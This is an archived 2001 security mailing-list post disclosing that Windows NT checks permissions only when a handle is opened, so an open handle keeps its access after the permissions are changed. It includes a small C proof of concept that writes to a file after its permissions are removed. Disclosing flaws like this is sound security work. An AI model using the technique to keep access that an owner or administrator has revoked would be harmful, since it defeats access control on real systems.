Windows NT does not check permissions after HANDLEs are open

From: c0nceptat_private
Date: Wed Aug 29 2001 - 16:00:26 PDT

  • Next message: Wyatt, Anthony (ITS, Limestone Av): "RE: Outlook makes 99% CPU Usage with this message"

    -----BEGIN PGP SIGNED MESSAGE-----
    
    
       Sorry for the cross-post; I thought this would be relevent to both communities.
    
       The component of the NT executive responsible for enforcing ACLs and DACLs is know as the Security Reference Monitor. When a kernel resource is requested, the requested program specifies the type of access it desires. The SRM checks against the access list, and grants the requestor a HANDLE to the object if requestor has appropriate rights.
        The check against the ACL only occurs when the HANDLE is first opened, however. If a HANDLE is opened and permissions on the objecect subsiquently change, the original requestor of the object retains the original access-permissions. Therefore, if is possible to retain access to an object after the Create/Owner or an administrator has changed the ACL simply by maintaining an open handle. If the requestor is a service or server-program that is expected to run 24/7 the object will remain accessible long after the ACL has been altered [thing ISAPI,extended stored procedures, et al].
    
    
      -- c0ncept
    
      O/T: I own a honda, and have been told by every mechanic that has looked at it that it is the easiest car to break into [ the AAA guy was nice enough to demonstrate]. I hear newer Hondas are even easier.
    
    proof of concept:
      1.) create a file named "test.txt". Make it writeable to the curretn user
      2.) compile and run the included C code
      3.) when the program prompts you to change the ACL, uncheck
          Allow Inheritable Permissions to Propagate and remove all
          entries from the ACE. Press <return> at the prompt.
      4.) Take ownership of the file and open it. Notice that although the
          ACL had already been modified, the write succeeded.
    
    [-- cut code here --]
    #include <windows.h>
    #include <stdio.h>
    #include <stdlib.h>
    
    #define FILE_NAME	"test.txt"
    #define MESSAGE		"Test"
    #define MSG_LEN		4
    
    int main(int argc, char** argv)
    {
    	HANDLE fileHandle;
    	DWORD written;
    
    	fileHandle = CreateFile(FILE_NAME,GENERIC_WRITE,
    		FILE_SHARE_READ | FILE_SHARE_WRITE, NULL,
    		OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL,NULL);
    	if(fileHandle == INVALID_HANDLE_VALUE){
    		perror("Invalid Handle Value.\n");
    		exit(1);
    	}
    	printf("Change the file's ACLs and press enter.");
    	getchar();
    	WriteFile(fileHandle,MESSAGE,MSG_LEN,&written,NULL);
    	CloseHandle(fileHandle);
    
    	return 0;
    }
    -----BEGIN PGP SIGNATURE-----
    Version: Hush 2.0
    
    wlwEARECABwFAjuNdeQVHGMwbmNlcHRAaHVzaG1haWwuY29tAAoJEPQWHaIUc7jETigA
    n3E8BIlimuBni27rFfMuDV5FslDTAKCWoLPNCVWbYkFZOqoQB0JfHHfRWw==
    =gsEn
    -----END PGP SIGNATURE-----
    



    This archive was generated by hypermail 2b30 : Wed Aug 29 2001 - 22:08:20 PDT